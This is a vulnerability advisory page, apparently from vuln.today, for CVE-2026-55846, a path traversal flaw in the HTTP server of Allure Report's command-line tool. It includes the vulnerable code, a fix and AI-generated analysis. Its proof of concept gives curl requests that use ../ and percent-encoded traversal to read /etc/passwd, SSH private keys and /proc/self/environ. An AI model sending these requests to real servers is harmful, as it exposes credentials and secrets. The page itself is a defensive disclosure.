Skip to main content

Allure Report CVE-2026-55846

MEDIUM
Path Traversal (CWE-22)
2026-06-19 https://github.com/allure-framework/allure2 GHSA-82cg-3hv7-74gc
6.2
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
6.2 MEDIUM
AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vuln.today AI
6.2 MEDIUM

Default localhost binding warrants AV:L; no authentication on the HTTP server justifies PR:N; only file read is achievable so I:N and A:N.

3.1 AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
4.0 AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Local
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 19, 2026 - 23:39 vuln.today
Analysis Generated
Jun 19, 2026 - 23:39 vuln.today
CVE Published
Jun 19, 2026 - 21:15 github-advisory
MEDIUM 6.2

DescriptionGitHub Advisory

Summary

The built-in HTTP server started by allure serve and allure open is vulnerable to path traversal. The server resolves request URI paths directly against the report directory without normalizing or validating that the resolved path stays within the report directory. An attacker who can reach the server can read any file accessible to the Allure process by sending a request containing ../ sequences.

Details

When allure serve or allure open is executed, Commands.setUpServer() creates an HTTP server with a handler that serves files from the report directory:

allure-commandline/src/main/java/io/qameta/allure/Commands.java:325-339

java
protected HttpServer setUpServer(final String host, final int port, final Path reportDirectory) throws IOException {
    final HttpServer server = HttpServer
            .create(new InetSocketAddress(Objects.isNull(host) ? "localhost" : host, port), 0);

    server.createContext("/", exchange -> {
        final Path resolve = reportDirectory.resolve("." + exchange.getRequestURI().getPath());  // line 330
        if (Files.isDirectory(resolve)) {
            serveFile(exchange, resolve.resolve("index.html"));
        } else {
            serveFile(exchange, resolve);
        }
    });

    return server;
}

On line 330, the handler constructs a file path by concatenating "." with the raw request URI path and resolving it against reportDirectory. For a request to /../../../etc/passwd:

  1. exchange.getRequestURI().getPath() returns "/../../../etc/passwd"
  2. String concatenation produces "./../../../etc/passwd"
  3. reportDirectory.resolve("./../../../etc/passwd") resolves to e.g. /tmp/allure-report/./../../../etc/passwd
  4. The OS resolves this to /etc/passwd

There is no call to .normalize() followed by a .startsWith(reportDirectory) containment check. The serveFile() method (line 341) reads and returns any regular file without further validation.

Additionally, URI.getPath() returns the percent-decoded path, so %2e%2e is decoded to .., enabling traversal via /%2e%2e/%2e%2e/etc/passwd which bypasses clients that normalize .. in raw form.

The server defaults to binding on localhost (line 327), which limits remote exploitation. However, the --host option allows users to bind to any interface (e.g., --host 0.0.0.0), which is commonly used in CI/CD and containerized environments. Even when bound to localhost, the vulnerability is exploitable by:

  • Other local users on shared/multi-tenant systems
  • DNS rebinding attacks from malicious web pages visited by the user
  • Adjacent containers in CI/CD environments that share a network namespace

PoC

Step 1: Start the Allure server (simulating a typical CI/CD scenario with network binding):

bash
allure serve ./test-results --host 0.0.0.0 --port 9090

Step 2: Read /etc/passwd via path traversal:

bash
curl --path-as-is 'http://localhost:9090/../../../etc/passwd'

Step 3: Alternative using percent-encoded traversal (works even with clients that normalize ..):

bash
curl 'http://localhost:9090/%2e%2e/%2e%2e/%2e%2e/etc/passwd'

Step 4: Read sensitive application files (e.g., environment variables, SSH keys):

bash
curl --path-as-is 'http://localhost:9090/../../../home/user/.ssh/id_rsa'
curl --path-as-is 'http://localhost:9090/../../../proc/self/environ'

Each command returns the full contents of the requested file if readable by the Allure process.

Impact

An attacker who can reach the Allure HTTP server can read any file on the system that the Allure process has permissions to access. This includes:

  • System credentials: /etc/shadow (if running as root), SSH private keys, cloud provider credentials
  • Application secrets: Environment variables via /proc/self/environ, configuration files, API keys
  • Source code and data: Any file on the filesystem accessible to the running user

In CI/CD environments where Allure is commonly used, this could expose build secrets, deployment credentials, and other sensitive CI/CD artifacts. The lack of authentication means any client that can reach the server's port can exploit this vulnerability.

Recommended Fix

Normalize the resolved path and verify it remains within the report directory before serving:

java
server.createContext("/", exchange -> {
    final Path resolve = reportDirectory.resolve("." + exchange.getRequestURI().getPath()).normalize();
    if (!resolve.startsWith(reportDirectory.normalize())) {
        exchange.sendResponseHeaders(403, 0);
        exchange.getResponseBody().close();
        return;
    }
    if (Files.isDirectory(resolve)) {
        serveFile(exchange, resolve.resolve("index.html"));
    } else {
        serveFile(exchange, resolve);
    }
});

The .normalize() call collapses .. sequences, and the .startsWith() check ensures the resolved path is still within the report directory. Requests attempting traversal receive a 403 Forbidden response.

AnalysisAI

Path traversal in Allure Report's built-in HTTP server (allure-commandline <= 2.38.1) allows any client that can reach the server port to read arbitrary files accessible to the Allure process. The vulnerability exists in Commands.setUpServer() where request URI paths are resolved against the report directory without normalization or containment checks, and Java's URI.getPath() additionally percent-decodes sequences like %2e%2e to .., bypassing client-side normalization. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify exposed Allure server port
Delivery
Craft HTTP request with ../ or %2e%2e traversal path
Exploit
Java URI.getPath() decodes percent-encoded sequences
Execution
reportDirectory.resolve() escapes report directory
Persist
serveFile() streams target file with no validation
Impact
Attacker receives arbitrary file contents

Vulnerability AssessmentAI

Exploitation Exploitation requires that the Allure HTTP server is actively running (via allure serve or allure open) and reachable by the attacker. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The NVD-assigned CVSS vector CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N scores 6.2 and reflects the default localhost binding, which materially limits network-based exploitation. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A CI/CD job on a shared runner starts Allure with allure serve ./test-results --host 0.0.0.0 --port 9090 to expose results for review. A co-located process or adjacent container on the same network sends curl --path-as-is 'http://runner-host:9090/../../../home/ci/.ssh/id_rsa', retrieving the CI runner's SSH private key in a single unauthenticated request. …
Remediation Upgrade io.qameta.allure:allure-commandline to version 2.39.0 or later, which applies .normalize() to the resolved path and enforces a .startsWith() containment check before serving any file, per the vendor advisory at https://github.com/allure-framework/allure2/security/advisories/GHSA-82cg-3hv7-74gc. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Java

View all
CVE-2012-4681 CRITICAL POC
9.8 Aug 28

Oracle Java SE 7 Update 6 and earlier contains multiple sandbox bypass vulnerabilities via the ClassFinder and forName m

CVE-2015-7450 CRITICAL POC
9.8 Jan 02

Remote code execution in IBM Sterling B2B Integrator, Sterling Integrator, and Tivoli Common Reporting allows unauthenti

CVE-2013-2465 CRITICAL POC
9.8 Jun 18

Java Runtime Environment sandbox bypass via incorrect image channel verification in 2D component allows remote unauthent

CVE-2011-3544 CRITICAL POC
9.8 Oct 19

Oracle Java SE JDK/JRE 7 and 6 Update 27 and earlier allows remote code execution with complete system compromise throug

CVE-2010-1871 HIGH POC
8.8 Aug 05

JBoss Seam 2 in Red Hat JBoss EAP 4.3.0 fails to sanitize JBoss Expression Language inputs, allowing remote attackers to

CVE-2012-1723 CRITICAL POC
9.8 Jun 16

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 up

CVE-2013-0422 CRITICAL POC
9.8 Jan 10

Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using

CVE-2012-0507 CRITICAL POC
9.8 Jun 07

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Up

CVE-2015-4852 CRITICAL POC
9.8 Nov 18

The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers

CVE-2012-5076 CRITICAL POC
9.8 Oct 16

Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allow

CVE-2017-3066 CRITICAL POC
9.8 Apr 27

Remote unauthenticated attackers can execute arbitrary code on Adobe ColdFusion servers through Java deserialization fla

CVE-2012-0391 CRITICAL POC
9.8 Jan 08

The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during

Share

CVE-2026-55846 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy